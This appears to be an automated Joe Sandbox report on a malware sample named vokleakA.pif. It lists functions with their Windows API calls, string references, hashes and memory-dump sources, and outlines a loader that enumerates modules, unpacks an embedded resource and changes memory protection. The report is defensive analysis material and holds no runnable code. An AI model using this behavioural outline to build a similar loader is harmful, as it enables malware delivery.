Instruction ID: 21b9a77931a6422373b5f01ca942d2afef63dd246bf47a135b0e223154f3ec48
Opcode Fuzzy Hash: 36579eb908b4612483d9e0b575ed2057a98aaabc1e9f27d311cf5ddc25fbb25e
Instruction Fuzzy Hash: 3FF03A71A80380EEF724AB21AC97F9536A4DB00B95F1090A5F6146A0D0CBFA3CC88E25

Uniqueness

Uniqueness Score: -1.00%

Function 04127618 Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 04127621
SelectObject.GDI32(00000000,058A00B4), ref: 04127633
GetTextMetricsA.GDI32(00000000), ref: 0412763E
ReleaseDC.USER32(00000000,00000000), ref: 0412764F

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: MetricsObjectReleaseSelectText
String ID:
API String ID: 2013942131-0
Opcode ID: 5705b044e0b66b9c3d434127ca13b470357f94cbb0691aa57a59605873c043b2
Instruction ID: 92f0c46c6280bb6cc70d90f34b8d68a49eedc0dd4caf059819047aeec4a1b0b9
Opcode Fuzzy Hash: 5705b044e0b66b9c3d434127ca13b470357f94cbb0691aa57a59605873c043b2
Instruction Fuzzy Hash: 52E0266160313032F62032691ED0BAB3A4C8F022A4F080191FC68EA3C0DB45FE2083F6

Uniqueness

Uniqueness Score: -1.00%

Function 041221F8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 172COMMON

Download Yara Rule

APIs

Part of subcall function 041214D8: EnterCriticalSection.KERNEL32(?,04121515), ref: 041214DC

CompareStringA.KERNEL32(00000400,00000001,00000000,?,00000000,Default,00000000,041223EC,?,00000000,04122414), ref: 04122327
CreateFontIndirectA.GDI32(?), ref: 041223C9

Strings

Default, xrefs: 041222EE, 041222FC, 041222FD

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: CompareCreateCriticalEnterFontIndirectSectionString
String ID: Default
API String ID: 249151401-753088835
Opcode ID: abf3d92d5df4f7f644cd90ad1b48eab9d6a563553d00d002a8225e3666661801
Instruction ID: 079ee6e911423ffdf59d9f9c0b818762238ab3cb27ccd0422d0d7a117f63d025
Opcode Fuzzy Hash: abf3d92d5df4f7f644cd90ad1b48eab9d6a563553d00d002a8225e3666661801
Instruction Fuzzy Hash: 84618C30A04298DFEB15CFA8C6C0B9EBBF5AF49304F1580E5E840E7291D774AE54CB65

Uniqueness

Uniqueness Score: -1.00%

Function 04101D08 Relevance: 5.3, APIs: 4, Instructions: 330COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e145db8344ecaf7d665082d2719af41129192a5e5180b8de3f8a8eb96481aaa
Instruction ID: 6cb1bad69c74831db0594e04bd7520a244a4e5c48ec1f9c29a70c1c46dff9ab4
Opcode Fuzzy Hash: 8e145db8344ecaf7d665082d2719af41129192a5e5180b8de3f8a8eb96481aaa
Instruction Fuzzy Hash: 59A1E6767106005BE719AA7C9CC43ADB3C29B85765F18C6BEE115CB2C0EBEEE9458384

Uniqueness

Uniqueness Score: -1.00%

Function 0410A5EC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,0410A6DA), ref: 0410A672
GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,0410A6DA), ref: 0410A678

Strings

yyyy, xrefs: 0410A64D

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: DateFormatLocaleThread
String ID: yyyy
API String ID: 3303714858-3145165042
Opcode ID: 2aba3c0f2127e8063e4b8fe38bae94514bf046838910b4737b5b82f52d1a18e4
Instruction ID: b37305f3c24365b97a48b701e292eb259122635431359153992dc2ffcf8c5213
Opcode Fuzzy Hash: 2aba3c0f2127e8063e4b8fe38bae94514bf046838910b4737b5b82f52d1a18e4
Instruction Fuzzy Hash: BE218675A002189FEB14EF94C9C1AAE73F8EF19740F4184A5E905E72D0DBB4BE40CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0413A904 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

IntersectRect.USER32(?,?,?), ref: 0413A964
EqualRect.USER32(?,?), ref: 0413A974

Strings

@, xrefs: 0413A945

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: Rect$EqualIntersect
String ID: @
API String ID: 3291753422-2766056989
Opcode ID: cbc18d0ac1d896cb12466ba29234260cad3ac865e903ab36d0426d2633c7346d
Instruction ID: 654fa0c981ef3be7356df9020ce7f0b1f43247acebc0dc3bf414f475318085e7
Opcode Fuzzy Hash: cbc18d0ac1d896cb12466ba29234260cad3ac865e903ab36d0426d2633c7346d
Instruction Fuzzy Hash: 71115E31A04258ABD711DBACC8C4BDEBBECAF49259F0842A1EC54EB392D775E905C7D0

Uniqueness

Uniqueness Score: -1.00%

Function 0412AF38 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000000), ref: 0412AF86
GetSystemMetrics.USER32(00000001), ref: 0412AF98

Part of subcall function 0412ACA4: GetProcAddress.KERNEL32(75A50000,00000000), ref: 0412AD23

Strings

MonitorFromPoint, xrefs: 0412AF4A

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: MetricsSystem$AddressProc
String ID: MonitorFromPoint
API String ID: 1792783759-1072306578
Opcode ID: 7ac25556bd7ff13d02db66c82c01d7a713d10b92d0c372d7d879bd284f379ac7
Instruction ID: 33072049cf1c8e65ce94ba0612273953bdceab023935c03b8ddfb220cb7d56cf
Opcode Fuzzy Hash: 7ac25556bd7ff13d02db66c82c01d7a713d10b92d0c372d7d879bd284f379ac7
Instruction Fuzzy Hash: 7D01A271300264AFEB008E55DA84B9DBB65FF857D5F004014F904DB242D7BCACA987E0

Uniqueness

Uniqueness Score: -1.00%

Function 0412AE10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000000), ref: 0412AE61
GetSystemMetrics.USER32(00000001), ref: 0412AE6D

Part of subcall function 0412ACA4: GetProcAddress.KERNEL32(75A50000,00000000), ref: 0412AD23

Strings

MonitorFromRect, xrefs: 0412AE25

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: MetricsSystem$AddressProc
String ID: MonitorFromRect
API String ID: 1792783759-4033241945
Opcode ID: d1cadc6517028421ab0c06b03dcd0b2c580eac22edbbf60bb2371e7beef58011
Instruction ID: 572f2698212cf884db717eb2ad2a10e3543bd262210a10423218e420c40217f0
Opcode Fuzzy Hash: d1cadc6517028421ab0c06b03dcd0b2c580eac22edbbf60bb2371e7beef58011
Instruction Fuzzy Hash: 63016232300264ABFB948E15DAC4B5ABBA9DF807D9F048491E905DB141C778EC96CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0412AD88 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(?), ref: 0412ADEA

Part of subcall function 0412ACA4: GetProcAddress.KERNEL32(75A50000,00000000), ref: 0412AD23

GetSystemMetrics.USER32(?), ref: 0412ADB0

Strings

GetSystemMetrics, xrefs: 0412AD98

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: MetricsSystem$AddressProc
String ID: GetSystemMetrics
API String ID: 1792783759-96882338
Opcode ID: d9bd21f8bb6d614c0668df046be815098e3b38beac192bf09af443a0e1f63945
Instruction ID: 8fed0d9a3a1e9fc7e70ebbef7a4474223e18342b7c51b737f61f5d05ec09d5f0
Opcode Fuzzy Hash: d9bd21f8bb6d614c0668df046be815098e3b38beac192bf09af443a0e1f63945
Instruction Fuzzy Hash: C5F0F0703101A84FEB148A38DBC42223555EF892F2F404B22E311C61C4E7FDBCA4D240

Uniqueness

Uniqueness Score: -1.00%

Function 041331E8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32keyboardCOMMON

Download Yara Rule

APIs

GetKeyState.USER32(00000010), ref: 04133203
GetKeyState.USER32(00000011), ref: 04133214

Strings

, xrefs: 04133223

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: State
String ID:
API String ID: 1649606143-3916222277
Opcode ID: e8b94229468f08648c098670f5d6776d8ac0e1124f50fdf48a83691f03f9fb1a
Instruction ID: 86c8843ddc61d2008a466a09339efb38268172103bee10b915a722a4ef7b9e22
Opcode Fuzzy Hash: e8b94229468f08648c098670f5d6776d8ac0e1124f50fdf48a83691f03f9fb1a
Instruction Fuzzy Hash: 8FE02222B0078922F612B8A82C803E713804F537AAF0843AAFFE05A0C1E386391191A9

Uniqueness

Uniqueness Score: -1.00%

Function 04158C28 Relevance: 5.1, APIs: 4, Instructions: 72COMMON

Download Yara Rule

APIs

IsBadReadPtr.KERNEL32(?,00000004,?,00000004,?,00000008), ref: 04158C5C
IsBadWritePtr.KERNEL32(?,00000004,?,00000004,?,00000004,?,00000008), ref: 04158C8C
IsBadReadPtr.KERNEL32(?,00000008), ref: 04158CAB
IsBadReadPtr.KERNEL32(?,00000004,?,00000008), ref: 04158CB7

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: Read$Write
String ID:
API String ID: 3448952669-0
Opcode ID: f0b00c3df094b11b5a48fba442859b1c5b70d8bc394c6ba809d978a3f1d86900
Instruction ID: 62bb2f53f3caf9fd76be93528e5f16f13b2e35dd3bcfcc054938a994b2a48568
Opcode Fuzzy Hash: f0b00c3df094b11b5a48fba442859b1c5b70d8bc394c6ba809d978a3f1d86900
Instruction Fuzzy Hash: F321CDB0641219DBDF10EE28CCC0BEEB7B8EB80321F008551EE20A7384D774F82186A4

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: vokleakA.pifPID: 3716, Parent PID: 4332COMMON

Execution Graph

Execution Coverage:	6%
Dynamic/Decrypted Code Coverage:	1.2%
Signature Coverage:	4.5%
Total number of Nodes:	1255
Total number of Limit Nodes:	34

Executed Functions

Function 004019F0 Relevance: 146.0, APIs: 34, Strings: 49, Instructions: 747
comprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OleInitialize.OLE32(00000000), ref: 004019FD
_getenv.LIBCMT ref: 00401ABA
GetCurrentProcessId.KERNEL32 ref: 00401ACD
CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401AD6
Module32First.KERNEL32 ref: 00401C48
CloseHandle.KERNEL32(00000000,?,?,00000000,?), ref: 00401C9D
Module32Next.KERNEL32(00000000,?), ref: 00401D02
Module32Next.KERNEL32(00000000,?), ref: 00401DB6
FindCloseChangeNotification.KERNELBASE(00000000), ref: 00401DC4
GetModuleHandleA.KERNEL32(00000000), ref: 00401DCB
FindResourceA.KERNEL32(00000000,00000000,00000000), ref: 00401E90
LoadResource.KERNEL32(00000000,00000000), ref: 00401E9E
LockResource.KERNEL32(00000000), ref: 00401EA7
SizeofResource.KERNEL32(00000000,00000000), ref: 00401EB3
_malloc.LIBCMT ref: 00401EBA
_memset.LIBCMT ref: 00401EDD
SizeofResource.KERNEL32(00000000,?), ref: 00401F02

Strings

x, xrefs: 00401E69
D, xrefs: 00401DFB
[, xrefs: 00401B37
W, xrefs: 00401B23
!, xrefs: 004020CF
{, xrefs: 0040211D
W, xrefs: 00402033
4, xrefs: 00402074
x, xrefs: 0040214A
4, xrefs: 00402136
!, xrefs: 0040201A
*, xrefs: 00401A1F
[, xrefs: 00402047
___, xrefs: 0040227D
', xrefs: 00402006
V, xrefs: 00401E19
!, xrefs: 00401B1E
v, xrefs: 0040206A
v, xrefs: 0040212C
", xrefs: 00401B0F
o, xrefs: 00402097
%, xrefs: 004020FA
_._, xrefs: 00402257
W, xrefs: 004020E6
*, xrefs: 004020E1
., xrefs: 0040201F
v, xrefs: 00401E4B
4, xrefs: 00401B64
x, xrefs: 00401B78
0, xrefs: 00401BBD
8, xrefs: 00401BA9
{, xrefs: 00401E3C
', xrefs: 00401AF6
{, xrefs: 0040205B
{, xrefs: 00401B4B
U, xrefs: 004020F5
x, xrefs: 00402088
o, xrefs: 00402159
:, xrefs: 00401B28
o, xrefs: 00401B8D
., xrefs: 00401B0A
W, xrefs: 00401B14
V, xrefs: 00402038
6, xrefs: 004020C5
E, xrefs: 00401E0F
), xrefs: 0040202E
h, xrefs: 00401A6F
v, xrefs: 00401B5A
5, xrefs: 00402109

Memory Dump Source

Source File: 00000004.00000002.3207967153.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3207967153.000000000044A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vokleakA.jbxd

Yara matches

Similarity

API ID: Resource$Module32$CloseFindHandleNextSizeof$ChangeCreateCurrentFirstInitializeLoadLockModuleNotificationProcessSnapshotToolhelp32_getenv_malloc_memset
String ID: !$!$!$"$%$'$'$)$*$*$.$.$0$4$4$4$5$6$8$:$D$E$U$V$V$W$W$W$W$[$[$_._$___$h$o$o$o$v$v$v$v$x$x$x$x${${${${
API String ID: 2366190142-2962942730
Opcode ID: d0a656ef22f929bc6f1ae9c8f6a3c9921df1d352ff09963eac3f83f05ace134f
Instruction ID: 7b7814addfdf4b3cbdaef5ede101091f5fb3e94df766619d88950efa0d528cfd
Opcode Fuzzy Hash: d0a656ef22f929bc6f1ae9c8f6a3c9921df1d352ff09963eac3f83f05ace134f
Instruction Fuzzy Hash: B3628C2100C7C19EC321DB388888A5FBFE55FA6328F484A5DF1E55B2E2C7799509C76B

Uniqueness

Uniqueness Score: -1.00%

Function 35BD4770 Relevance: .7, Instructions: 656COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3237355887.0000000035BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_35bd0000_vokleakA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86e17d3ca143b8bc1713396d4ed098457a4e74e4b9780b8da3110c592ebab4e7
Instruction ID: bc1f2eb340d5f05bdd17580018123580ed3c0dbab4ffcd50afce227bffac7a3e
Opcode Fuzzy Hash: 86e17d3ca143b8bc1713396d4ed098457a4e74e4b9780b8da3110c592ebab4e7
Instruction Fuzzy Hash: 27224F34B002158FEB089F69C894B3EB6E7BFC8711F158869E50A9B3A5CFB4DC468741

Uniqueness

Uniqueness Score: -1.00%

Function 004018F0 Relevance: 6.3, APIs: 5, Instructions: 77stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?), ref: 00401906
MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 0040192F
GetLastError.KERNEL32 ref: 00401940
MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401958
MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401980

Memory Dump Source

Source File: 00000004.00000001.2001615999.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000001.2001615999.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 00000004.00000001.2001615999.000000000044A000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_1_400000_vokleakA.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$ErrorLastlstrlen
String ID:
API String ID: 3322701435-0
Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
Instruction ID: 001f8acd6346668203df0e37acbb0982e2c141f20d3592a2a78c171e7710dcce
Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
Instruction Fuzzy Hash: 4011C4756003247BD3309B15CC88F677F6CEB86BA9F008169FD85AB291C635AC04C6F8

Uniqueness

Uniqueness Score: -1.00%

Function 0040AF66 Relevance: 6.0, APIs: 4, Instructions: 34COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 0040AF80

Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4

std::bad_alloc::bad_alloc.LIBCMT ref: 0040AFA3

Part of subcall function 0040AEFC: std::exception::exception.LIBCMT ref: 0040AF08

std::bad_exception::bad_exception.LIBCMT ref: 0040AFB7
__CxxThrowException@8.LIBCMT ref: 0040AFC5

Memory Dump Source

Source File: 00000004.00000001.2001615999.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000001.2001615999.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 00000004.00000001.2001615999.000000000044A000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_1_400000_vokleakA.jbxd

Yara matches

Similarity

API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
String ID:
API String ID: 1411284514-0
Opcode ID: 248d97f5b0d58b32bb2c6dfd0cee56c1e8c558e55d5e2921fa5105a46d33be9f
Instruction ID: 8b9ae61c6da4be1dff3a05d3864a1109474d1d20ea1a05e38be312cad591667e
Opcode Fuzzy Hash: 248d97f5b0d58b32bb2c6dfd0cee56c1e8c558e55d5e2921fa5105a46d33be9f
Instruction Fuzzy Hash: 67F0BE21A0030662CA15BB61EC06D8E3B688F4031CB6000BFE811761D2CFBCEA55859E

Uniqueness

Uniqueness Score: -1.00%

Function 31B191E0 Relevance: 1.6, APIs: 1, Instructions: 56
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 31B19254

Memory Dump Source

Source File: 00000004.00000002.3231199992.0000000031B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 31B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_31b10000_vokleakA.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 3376955826f2e022a242f41ddea83da3fe0c7ab92e298806b0001c099ce3534b
Instruction ID: f8802d90e0593ae8ae4fc0130b5cf9f4e1a9acb1e99852e350a882d2b5e58762
Opcode Fuzzy Hash: 3376955826f2e022a242f41ddea83da3fe0c7ab92e298806b0001c099ce3534b
Instruction Fuzzy Hash: 771117B1D002499FDB10DFAAC540AEEFBF8FF48320F10842AD419A7250C779A940CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 31B193B8 Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindCloseChangeNotification.KERNELBASE ref: 31B1941A

Memory Dump Source

Source File: 00000004.00000002.3231199992.0000000031B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 31B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_31b10000_vokleakA.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 9c4cd828ebad215c09112ca1cce53fdfd89554a6b0aec6a795484bfb6252d723
Instruction ID: b3115cda103188e9894b11dffa511ebfb3af50ce78718de3a408e8c00c39913e
Opcode Fuzzy Hash: 9c4cd828ebad215c09112ca1cce53fdfd89554a6b0aec6a795484bfb6252d723
Instruction Fuzzy Hash: FE1128B1D002488FDB20DFAAC5457AEFBF4EF88324F208429D519A7240CB79A940CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00401870 Relevance: 1.5, APIs: 1, Instructions: 33memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0040AF66: _malloc.LIBCMT ref: 0040AF80

SysAllocString.OLEAUT32 ref: 00401898

Memory Dump Source

Source File: 00000004.00000001.2001615999.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000001.2001615999.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 00000004.00000001.2001615999.000000000044A000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_1_400000_vokleakA.jbxd

Yara matches

Similarity

API ID: AllocString_malloc
String ID:
API String ID: 959018026-0
Opcode ID: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
Instruction ID: c2922591c351a4c461934d9b8210169c8be4224f150a02a6988c85a72df9e820
Opcode Fuzzy Hash: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
Instruction Fuzzy Hash: BEF02073501322A7E3316B658841B47B6E8DF80B28F00823FFD44BB391D3B9C85082EA

Uniqueness

Uniqueness Score: -1.00%

Function 0040D534 Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040D549

Memory Dump Source

Source File: 00000004.00000001.2001615999.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000001.2001615999.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 00000004.00000001.2001615999.000000000044A000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_1_400000_vokleakA.jbxd

Yara matches

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
Instruction ID: a29dbb507fbbbc11cf477c5ad410ace9233c9b691e3651c0b65acef059567112
Opcode Fuzzy Hash: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
Instruction Fuzzy Hash: E8D05E36A54348AADB11AFB47C08B623BDCE388396F404576F80DC6290F678D641C548

Uniqueness

Uniqueness Score: -1.00%

Function 35BD3B30 Relevance: 1.5, Strings: 1, Instructions: 239
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

xaq, xrefs: 35BD3DBA

Memory Dump Source

Source File: 00000004.00000002.3237355887.0000000035BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_35bd0000_vokleakA.jbxd

Similarity

API ID:
String ID: xaq
API String ID: 0-793007810
Opcode ID: e41d4501c7f6fcbd2f769cdbd724a758737b322feff5e85d4c6f4ca0c3ba4592
Instruction ID: c916162b7fae6af52fa613aba7ff295c9182ea42801b52f57c3d560aeb2b1542
Opcode Fuzzy Hash: e41d4501c7f6fcbd2f769cdbd724a758737b322feff5e85d4c6f4ca0c3ba4592
Instruction Fuzzy Hash: DB61E935B007174FEF1CAF794A11F1FA5E6AF88650F55843DD90ACB29AEE74D80242B2

Uniqueness

Uniqueness Score: -1.00%

Function 35BD37B8 Relevance: 1.4, Strings: 1, Instructions: 136
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Te]q, xrefs: 35BD3859

Memory Dump Source

Source File: 00000004.00000002.3237355887.0000000035BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_35bd0000_vokleakA.jbxd

Similarity

API ID:
String ID: Te]q
API String ID: 0-52440209
Opcode ID: 0d76c55fc05638ff571aaa0125d701a9f5ee9b34a909a4f8ee5938a1de0ed86d
Instruction ID: d3033a26f5124b048aa1b7631ba498befd08895ba2c12753e9cbaf19ec685828
Opcode Fuzzy Hash: 0d76c55fc05638ff571aaa0125d701a9f5ee9b34a909a4f8ee5938a1de0ed86d
Instruction Fuzzy Hash: D2515C70A40205DFDB149F75C858B6ABBF2AF48720F218169E416AB3A5CFB5AC41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 35BD3138 Relevance: 1.3, Strings: 1, Instructions: 67
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Te]q, xrefs: 35BD3152

Memory Dump Source

Source File: 00000004.00000002.3237355887.0000000035BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_35bd0000_vokleakA.jbxd

Similarity

API ID:
String ID: Te]q
API String ID: 0-52440209
Opcode ID: d584beedd247f27c37316edb6b0235e71218323ebe92c2957216e160ef03f28b
